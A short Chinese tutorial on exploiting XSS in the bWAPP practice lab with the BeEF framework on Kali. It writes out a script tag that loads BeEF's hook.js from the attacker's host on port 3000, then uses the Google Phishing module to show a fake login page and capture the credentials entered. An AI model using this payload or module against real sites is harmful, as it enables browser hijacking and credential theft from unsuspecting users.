安装好的kail
XSS漏洞环境(这里我用的是bWAPP,百度安装即可)
首先打开我们的kail,打开我们的beef工具:

q切换到/usr/share/beef-xss或者输入如下代码启动:
1
./beef

然后登陆到我们beef页面用户名和密码都是beef

打开我们准备好的XSS漏洞页面,写入的XSS脚本(这个代码在我们打开的beef页面可以找到)
1 | <script src="http://ip地址:3000/hook.js"></script> |

插入代码后,我们可以F12去检查一下我们是否已经插入,如图

查看页面看到我们的脚本已经提交,然后回到我们beef页面就可以看到,返单过来的信息,如下

然后点击commands,可以看到很多攻击方式,有漏董利用,metasploit,会话劫持等,我们简单的选择一个模块测试一下,这里我选择的是Goole Phishing(谷歌钓鱼),然后点击执行

然后返回我们的测试页面,会看到我们页面,加载了一个谷歌登录页面:

然后我们简单登陆,然后会显示无法连接,我们点回beef页面,可以看到获取过来的账号密码:

以上就是简单的XSS漏洞利用和beef使用,如果看不懂英文,可以放到带有翻译的浏览器,如下
